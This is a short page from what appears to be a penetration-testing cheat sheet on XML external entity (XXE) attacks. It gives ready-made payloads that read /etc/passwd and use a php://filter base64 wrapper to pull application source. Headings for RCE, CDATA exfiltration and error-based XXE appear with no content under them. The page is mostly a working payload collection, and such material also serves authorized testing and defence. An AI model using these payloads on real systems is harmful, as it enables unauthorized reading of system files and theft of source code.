search

XXE

hashtag
LFI

<?xml version="1.0"?>
<!DOCTYPE email [
  <!ENTITY company SYSTEM "file:///etc/passwd">
]>
<root>
<name></name>
<tel></tel>
<email>&company;</email>
<message></message>
</root>

hashtag
LFI Encoded

<?xml version="1.0"?>
<!DOCTYPE email [
  <!ENTITY company SYSTEM "php://filter/convert.base64-encode/resource=index.php">
]>
<root>
<name></name>
<tel></tel>
<email>&company;</email>
<message></message>
</root>

hashtag
RCE

hashtag
CDATA Exfiltration

hashtag
Error Based XXE

  • Host this external dtd on our server

PreviousServer IncludesNextWSDL/SOAP

Last updated